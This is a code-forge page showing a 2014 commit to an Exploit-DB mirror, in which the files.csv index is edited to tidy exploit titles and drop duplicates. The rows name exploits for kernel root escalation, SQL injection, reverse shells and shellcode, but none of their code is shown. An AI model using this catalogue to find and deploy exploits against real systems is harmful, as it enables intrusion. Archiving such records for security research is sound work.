bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 05_19_2014

Browse source
This commit is contained in:
Offensive Security 2014-05-19 04:36:23 +00:00
parent a1eaa87beb
commit 51cca24be3
30 changed files with 595 additions and 1468 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

91
files.csv
View file

@ -744,7 +744,7 @@ id,file,description,date,author,platform,type,port
923,platforms/cgi/webapps/923.pl,"The Includer CGI <= 1.0 - Remote Command Execution (2)",2005-04-08,K-C0d3r,cgi,webapps,0
924,platforms/linux/local/924.c,"sash <= 3.7 - Local Buffer Overflow Exploit",2005-04-08,lammat,linux,local,0
925,platforms/asp/webapps/925.txt,"ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit",2005-04-09,LaMeR,asp,webapps,0
926,platforms/linux/local/926.c,"Linux Kernel 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)",2005-10-26,qobaiashi,linux,local,0
926,platforms/linux/local/926.c,"Linux Kernel 2.4/2.6 - bluez Local Root Privilege Escalation Exploit (Update 3)",2005-10-26,qobaiashi,linux,local,0
927,platforms/windows/local/927.c,"MS Jet Database (msjet40.dll) DB File Buffer Overflow Exploit",2005-04-11,"Stuart Pearson",windows,local,0
928,platforms/php/webapps/928.py,"PunBB 1.2.4 (change_email) SQL Injection Exploit",2005-04-11,"Stefan Esser",php,webapps,0
929,platforms/windows/local/929.py,"MS Jet Database (msjet40.dll) Reverse Shell Exploit",2005-04-12,"Tal Zeltzer",windows,local,0
@ -8077,7 +8077,7 @@ id,file,description,date,author,platform,type,port
8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0
8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0
8571,platforms/php/webapps/8571.txt,"Tiger DMS (Auth Bypass) Remote SQL Injection Vulnerability",2009-04-29,"ThE g0bL!N",php,webapps,0
8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit",2009-04-30,"Jon Oberheide",linux,local,0
8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 UDEV < 141 - Local Privilege Escalation Exploit",2009-04-30,"Jon Oberheide",linux,local,0
8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 (Null Pointer) Remote Crash Exploit",2009-04-30,"Aditya K Sood",windows,dos,0
8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 (searchterm) Blind SQL Injection Exploit",2009-04-30,YEnH4ckEr,php,webapps,0
8577,platforms/php/webapps/8577.txt,"leap cms 0.1.4 (sql/xss/su) Multiple Vulnerabilities",2009-04-30,YEnH4ckEr,php,webapps,0
@ -8176,7 +8176,7 @@ id,file,description,date,author,platform,type,port
8670,platforms/windows/local/8670.php,"Pinnacle Studio 12 (.hfz) Directory Traversal Vulnerability",2009-05-13,Nine:Situations:Group,windows,local,0
8671,platforms/php/webapps/8671.pl,"Family Connections CMS <= 1.9 (member) SQL Injection Exploit",2009-05-13,YEnH4ckEr,php,webapps,0
8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0
8673,platforms/linux/local/8673.c,"Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit",2009-05-13,s0m3b0dy,linux,local,0
8673,platforms/linux/local/8673.c,"Linux Kernel 2.6.x - ptrace_attach Local Privilege Escalation Exploit",2009-05-13,s0m3b0dy,linux,local,0
8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection Vulnerability",2009-05-13,Qabandi,php,webapps,0
8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 Products Insecure Cookie Handling Vulnerability",2009-05-14,G4N0K,php,webapps,0
8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-05-14,"ThE g0bL!N",php,webapps,0
@ -8899,8 +8899,8 @@ id,file,description,date,author,platform,type,port
9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 (user.ini) Arbitrary Download Vulnerability",2009-08-13,"aBo MoHaMeD",hardware,remote,0
9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Remote Arbitrary Shell Upload Vulnerability",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0
9434,platforms/php/webapps/9434.txt,"tgs cms 0.x (xss/sql/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0
9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit",2009-08-14,spender,linux,local,0
9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x sock_sendpage() Local Root Exploit #2",2009-08-14,"Przemyslaw Frasunek",linux,local,0
9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x - sock_sendpage() Local Ring0 Root Exploit",2009-08-14,spender,linux,local,0
9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (2)",2009-08-14,"Przemyslaw Frasunek",linux,local,0
9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection Vulnerability",2009-08-14,IRCRASH,php,webapps,0
9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 (competition) SQL Injection Vuln",2009-08-14,Mr.SQL,php,webapps,0
9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability",2009-08-14,Mr.tro0oqy,php,webapps,0
@ -8942,7 +8942,7 @@ id,file,description,date,author,platform,type,port
9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0
9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android Edition)",2009-08-18,Zinx,android,local,0
9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4/2.6 - sock_sendpage() ring0 Root Exploit (simple ver)",2009-08-24,"INetCop Security",linux,local,0
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4/2.6 - sock_sendpage() ring0 Root Exploit (Simple Version)",2009-08-24,"INetCop Security",linux,local,0
9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0
9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b (Auth Bypass) Insecure Cookie Handling Vuln",2009-08-24,Mr.tro0oqy,php,webapps,0
@ -9007,7 +9007,7 @@ id,file,description,date,author,platform,type,port
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 - (32bit) ip_append_data() ring0 Root Exploit",2009-08-31,"INetCop Security",linux,local,0
9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit",2009-08-31,"Jon Oberheide",linux,local,0
9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 (index.php s) SQL Injection Vulnerability",2009-08-31,Red-D3v1L,php,webapps,0
9545,platforms/linux/local/9545.c,"Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit (ppc)",2009-08-31,"Ramon Valle",linux,local,0
9545,platforms/linux/local/9545.c,"Linux Kernel 2.4/2.6 - sock_sendpage() Local Root Exploit (PPC Edition)",2009-08-31,"Ramon Valle",linux,local,0
9546,platforms/windows/dos/9546.pl,"Swift Ultralite 1.032 (.M3U) Local Buffer Overflow PoC",2009-08-31,hack4love,windows,dos,0
9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server <= 9.2.0.111 - Remote DoS Exploit",2009-08-31,"Gaurav Baruah",windows,dos,0
9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b (.m3u/upl) Universal Local BOF Exploit (SEH)",2009-08-31,hack4love,windows,local,0
@ -9058,7 +9058,7 @@ id,file,description,date,author,platform,type,port
9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit",2009-09-09,"Pankaj Kohli",linux,local,0
9596,platforms/windows/remote/9596.py,"SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389
9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0
9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [2]",2009-09-09,"Ramon Valle",linux,local,0
9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4/2.6 - sock_sendpage() Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0
9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0
9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 (fonctions_racine.php) Remote File Inclusion Vuln",2009-09-09,"EA Ngel",php,webapps,0
9601,platforms/php/webapps/9601.php,"Joomla Component BF Survey Pro Free SQL Injection Exploit",2009-09-09,jdc,php,webapps,0
@ -9099,7 +9099,7 @@ id,file,description,date,author,platform,type,port
9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 Remote Source Code Disclosure Vulnerability",2009-09-11,SkuLL-HackeR,windows,remote,0
9639,platforms/php/webapps/9639.txt,"Image voting 1.0 (index.php show) SQL Injection Vulnerability",2009-09-11,SkuLL-HackeR,php,webapps,0
9640,platforms/php/webapps/9640.txt,"gyro 5.0 (sql/xss) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0
9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [3]",2009-09-11,"Ramon Valle",linux,local,0
9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4/2.6 - sock_sendpage() Local Root Exploit (3)",2009-09-11,"Ramon Valle",linux,local,0
9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit",2009-09-11,"Matthew Gillespie",multiple,dos,1812
9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal vulnerability",2009-09-11,"Usman Saeed",windows,remote,0
9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80
@ -9231,7 +9231,7 @@ id,file,description,date,author,platform,type,port
9839,platforms/php/webapps/9839.txt,"Achievo 1.3.4 - Remote File Inclusion",2009-09-22,M3NW5,php,webapps,0
9840,platforms/php/webapps/9840.txt,"Joomla GroupJive 1.8 B4 Remote File Inclusion",2009-09-22,M3NW5,php,webapps,0
9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
9842,platforms/php/local/9842.txt,"PHP 5.3.0 pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
9843,platforms/multiple/remote/9843.txt,"Blender 2.34, 2.35a, 2.4, 2.49b .blend File Command Injection",2009-11-05,"Core Security",multiple,remote,0
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 - Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0
9845,platforms/osx/local/9845.c,"OSX 10.5.6-10.5.7 ptrace mutex DoS",2009-11-05,prdelka,osx,local,0
@ -9291,7 +9291,6 @@ id,file,description,date,author,platform,type,port
9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include Vulnerability",1999-11-05,patrick,cgi,webapps,0
9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 base_qry_common.php Remote File Inclusion",2008-06-14,MC,php,webapps,0
9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection",2006-05-04,patrick,cgi,webapps,0
9910,platforms/php/webapps/9910.rb,"Dogfood CRM 2.0.10 spell.php Command Injection",2009-03-03,LSO,php,webapps,0
9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d graph_view.php Command Injection",2005-01-15,"David Maciejak",php,webapps,0
9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 - configdir Command Injection",2005-01-15,"Matteo Cantoni",cgi,webapps,0
9913,platforms/multiple/remote/9913.rb,"ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution",2007-08-24,patrick,multiple,remote,25
@ -9306,7 +9305,7 @@ id,file,description,date,author,platform,type,port
9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow",2002-06-10,noir,solaris,remote,6112
9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 - 2.2.8 - trans2open Overflow (OS X)",2003-04-07,"H D Moore",osx,remote,139
9925,platforms/osx/remote/9925.rb,"Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X)",2009-10-28,N/A,osx,remote,0
9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 tinybrowser Remote File Upload/Execute Vulnerability",2009-07-22,spinbad,php,webapps,0
9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 - tinybrowser Remote File Upload/Execute Vulnerability",2009-07-22,spinbad,php,webapps,0
9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0, 10.4.8 UPnP Location Overflow (OS X)",2009-10-28,N/A,osx,remote,0
9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X)",2004-07-13,ddz,osx,remote,21
9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 - Image Attachment Command Execution (OS X)",2006-03-01,"H D Moore",osx,remote,25
@ -9338,8 +9337,6 @@ id,file,description,date,author,platform,type,port
9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 DoS",2009-10-14,"Townsend Harris",hardware,dos,0
9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 PoC BoF",2009-10-23,"Francis Provencher",windows,remote,0
9958,platforms/jsp/webapps/9958.txt,"Pentaho <= 1.7.0.1062 xss and information disclosure",2009-10-15,antisnatchor,jsp,webapps,0
9959,platforms/windows/dos/9959.txt,"PGP4Win 1.4.9 PoC",2009-10-23,Dr_IDE,windows,dos,0
9960,platforms/php/webapps/9960.txt,"PHP 5.3.0 pdflib file disclosure",2009-11-06,"Sina Yazdanmehr",php,webapps,0
9961,platforms/php/webapps/9961.txt,"phpCMS 2008 file disclosure",2009-10-19,"Securitylab Security Research",php,webapps,0
9962,platforms/php/webapps/9962.txt,"Piwik <= 1357 2009-08-02 file upload and code execution",2009-10-19,boecke,php,webapps,0
9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0
@ -9350,7 +9347,6 @@ id,file,description,date,author,platform,type,port
9969,platforms/multiple/dos/9969.txt,"Snort <= 2.8.5 - IPv6 DoS",2009-10-23,"laurent gaffie",multiple,dos,0
9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive Service privilege escalation",2009-10-20,"bellick ",windows,local,0
9971,platforms/windows/local/9971.php,"Spider Solitaire PoC",2009-10-15,SirGod,windows,local,0
9972,platforms/multiple/remote/9972.c,"SSL MITM Vulnerability",2009-11-09,"Pavel Kankovsky",multiple,remote,0
9973,platforms/multiple/local/9973.sh,"Sun VirtualBox <= 3.0.6 - Privilege Escalation",2009-10-17,prdelka,multiple,local,0
9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0
9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Multiple Vulnerabilities XSS and CSRF",2009-11-16,"Alexey Sintsov",hardware,webapps,80
@ -9362,8 +9358,7 @@ id,file,description,date,author,platform,type,port
9984,platforms/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 xpas file BoF",2009-10-26,Dr_IDE,windows,local,0
9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 heap overflow and null pointer dereference",2009-10-17,"Adam Zabrocki",multiple,local,0
9987,platforms/multiple/remote/9987.txt,"ZoIPer Call-Info DoS",2009-10-14,"Tomer Bitton",multiple,remote,5060
9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0
9989,platforms/windows/local/9989.txt,"Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation Vulnerability",2009-11-11,"bellick ",windows,local,0
9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0
9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat U3D File Invalid Array Index Remote Vulnerability",2009-11-09,"Felipe Andres Manzano",multiple,local,0
9991,platforms/windows/local/9991.txt,"AlleyCode 2.21 SEH Overflow PoC",2009-10-05,"Rafael Sousa",windows,local,0
9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy ActiveX Control remote code execution",2009-10-01,Trotzkista,windows,remote,0
@ -9413,7 +9408,7 @@ id,file,description,date,author,platform,type,port
10036,platforms/solaris/remote/10036.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based)",2001-12-12,I)ruid,solaris,remote,0
10037,platforms/cgi/webapps/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow",2004-08-19,skape,cgi,webapps,0
10038,platforms/linux/local/10038.txt,"proc File Descriptors Directory Permissions bypass",2009-10-23,"Pavel Machek",linux,local,0
10039,platforms/windows/local/10039.txt,"GPG4Win GNU Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0
10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0
10042,platforms/php/webapps/10042.txt,"Achievo <= 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0
10043,platforms/php/webapps/10043.txt,"redcat media SQL Injection",2009-10-02,s4va,php,webapps,0
10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)",2009-10-12,"Michael Domberg",unix,local,0
@ -9440,7 +9435,7 @@ id,file,description,date,author,platform,type,port
10069,platforms/php/webapps/10069.php,"Empire CMS 47 SQL Injection",2009-10-05,"Securitylab Security Research",php,webapps,0
10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 nfx file integer overflow exploit",2009-10-05,bruiser,windows,remote,0
10071,platforms/multiple/remote/10071.txt,"Mozilla NSS NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-11-10,"Dan Kaminsky",multiple,remote,0
10072,platforms/multiple/local/10072.c,"Multiple Vendor TLS Protocol Session Renegotiation Security Vulnerability",2009-11-12,"Marsh Ray",multiple,local,0
10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security Vulnerability",2009-11-12,"Marsh Ray",multiple,local,0
10073,platforms/windows/remote/10073.py,"XM Easy Personal FTP 5.8 DoS",2009-10-02,PLATEN,windows,remote,21
10074,platforms/novell/webapps/10074.txt,"Novell eDirectory 8.8 SP5 'dconserv.dlm' Cross-Site Scripting",2009-10-01,"Francis Provencher",novell,webapps,8030
10075,platforms/novell/webapps/10075.txt,"Novell Edirectory 8.8 SP5 XSS",2009-09-23,"Francis Provencher",novell,webapps,8030
@ -12471,9 +12466,8 @@ id,file,description,date,author,platform,type,port
14226,platforms/php/webapps/14226.txt,"Bs Home_Classifieds Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14227,platforms/php/webapps/14227.txt,"Bs Events_Locator Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14228,platforms/php/webapps/14228.txt,"Bs General_Classifieds Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14229,platforms/php/webapps/14229.txt,"Bs Auto_Classifieds Script(articlesdetails.php) SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14229,platforms/php/webapps/14229.txt,"Bs Auto_Classifieds Script - (articlesdetails.php) SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14230,platforms/php/webapps/14230.txt,"Bs Business_Directory Script SQL Injection/Auth Bypass Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14231,platforms/php/webapps/14231.txt,"Bs Auto_Classifieds Script(articlesdetails.php) SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14232,platforms/php/webapps/14232.txt,"Joomla JPodium Component (com_jpodium) SQL Injection Vulnerability",2010-07-05,RoAd_KiLlEr,php,webapps,0
14233,platforms/php/webapps/14233.txt,"Bs Auction Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14234,platforms/linux/shellcode/14234.c,"125 bind port to 6778 XOR encoded polymorphic linux shellcode .",2010-07-05,gunslinger_,linux,shellcode,0
@ -13071,7 +13065,7 @@ id,file,description,date,author,platform,type,port
15018,platforms/asp/webapps/15018.txt,"moaub #16 - mojoportal Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0
15019,platforms/windows/dos/15019.txt,"MOAUB #16 - Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0
15022,platforms/windows/local/15022.py,"Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0
15023,platforms/linux/local/15023.c,"x86_64 Linux Kernel ia32syscall Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 - x86_64 ia32syscall Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27+ x86_64 compat exploit",2010-09-16,Ac1dB1tCh3z,linux,local,0
15026,platforms/windows/local/15026.py,"BACnet OPC Client Buffer Overflow Exploit",2010-09-16,"Jeremy Brown",windows,local,0
15027,platforms/windows/dos/15027.py,"MOAUB #17 - Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution",2010-09-17,Abysssec,windows,dos,0
@ -13261,7 +13255,7 @@ id,file,description,date,author,platform,type,port
15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
15283,platforms/windows/dos/15283.txt,"Hanso Converter <= 1.4.0 .ogg Denial of Service Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection Vulnerability",2010-10-19,"Salvatore Fresta",php,webapps,0
15285,platforms/linux/local/15285.c,"Linux RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
15285,platforms/linux/local/15285.c,"Linux Kernel <= 2.6.36-rc8 - RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit",2010-10-19,Mighty-D,windows,local,0
15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0
15290,platforms/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",jsp,webapps,0
@ -13390,7 +13384,7 @@ id,file,description,date,author,platform,type,port
15437,platforms/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Remote Directory Traversal Vulnerability",2010-11-05,"Yakir Wizman",windows,remote,0
15438,platforms/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Remote Directory Traversal Vulnerability",2010-11-06,"Yakir Wizman",windows,remote,0
15439,platforms/php/webapps/15439.txt,"Joomla Component (com_connect) Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0
15440,platforms/php/webapps/15440.txt,"Joomla Component (com_dcnews) Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0
15440,platforms/php/webapps/15440.txt,"Joomla DCNews Component com_dcnews - Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0
15441,platforms/php/webapps/15441.txt,"MassMirror Uploader Remote File Inclusion Vulnerability",2010-11-06,ViciOuS,php,webapps,0
15442,platforms/php/webapps/15442.txt,"Zeeways Adserver Multiple Vulnerabilities",2010-11-06,Valentin,php,webapps,0
15443,platforms/php/webapps/15443.txt,"RSform! 1.0.5 (Joomla) Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0
@ -13410,7 +13404,6 @@ id,file,description,date,author,platform,type,port
15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0
15460,platforms/php/webapps/15460.txt,"Joomla Component ProDesk 1.5 - Local File Inclusion Vulnerability",2010-11-08,d3v1l,php,webapps,0
15461,platforms/windows/local/15461.c,"G Data TotalCare 2011 0day Local Kernel Exploit",2010-11-08,"Nikita Tarakanov",windows,local,0
15462,platforms/php/webapps/15462.txt,"Joomla DCNews Component com_dcnews LFI Vulnerability",2010-11-08,"Th3 RDX",php,webapps,0
15463,platforms/linux/dos/15463.txt,"Novell Groupwise Internet Agent IMAP LIST Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0
15464,platforms/linux/dos/15464.txt,"Novell Groupwise Internet Agent IMAP LIST LSUB Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0
15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL injection Exploit",2010-11-09,"Easy Laster",php,webapps,0
@ -13629,7 +13622,7 @@ id,file,description,date,author,platform,type,port
15721,platforms/php/webapps/15721.txt,"Joomla Component Billy Portfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0
15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0
15723,platforms/freebsd/remote/15723.c,"FreeBSD LiteSpeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,kingcope,freebsd,remote,0
15725,platforms/linux/remote/15725.pl,"Exim 4.63 Remote Root Exploit",2010-12-11,kingcope,linux,remote,0
15725,platforms/linux/remote/15725.pl,"Exim 4.63 - Remote Root Exploit",2010-12-11,kingcope,linux,remote,0
15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 .m3u Buffer Overflow",2010-12-11,zota,windows,local,0
15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - CSRF Vulnerabilities",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0
15729,platforms/windows/local/15729.py,"PowerShell XP 3.0.1 - Buffer Overflow 0day",2010-12-12,m_101,windows,local,0
@ -13778,7 +13771,7 @@ id,file,description,date,author,platform,type,port
15907,platforms/php/webapps/15907.txt,"Nucleus 3.61 - Multiple Remote File Include",2011-01-05,n0n0x,php,webapps,0
15913,platforms/php/webapps/15913.pl,"PhpGedView <= 4.2.3 - Local File Inclusion Vulnerability",2011-01-05,dun,php,webapps,0
15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - XSS/Remote Code Execution Exploit",2011-01-05,mr_me,php,webapps,0
15916,platforms/linux/local/15916.c,"Linux Kernel CAP_SYS_ADMIN to root Exploit",2011-01-05,"Dan Rosenberg",linux,local,0
15916,platforms/linux/local/15916.c,"Linux Kernel 2.6.34+ - CAP_SYS_ADMIN x86 Local Privilege Escalation Exploit",2011-01-05,"Dan Rosenberg",linux,local,0
15917,platforms/php/webapps/15917.txt,"Ignition 1.3 (comment.php) Local File Inclusion Vulnerability",2011-01-06,n0n0x,php,webapps,0
15918,platforms/jsp/webapps/15918.txt,"Openfire 3.6.4 - Multiple CSRF Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",jsp,webapps,0
15919,platforms/windows/local/15919.pl,"Enzip 3.00 Buffer Overflow Exploit",2011-01-06,"C4SS!0 G0M3S",windows,local,0
@ -13798,7 +13791,7 @@ id,file,description,date,author,platform,type,port
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH)",2011-01-08,fdisk,windows,local,0
15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
15943,platforms/php/webapps/15943.txt,"mingle forum (wordpress plugin) <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
15944,platforms/linux/local/15944.c,"Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)",2011-01-08,"Joe Sylve",linux,local,0
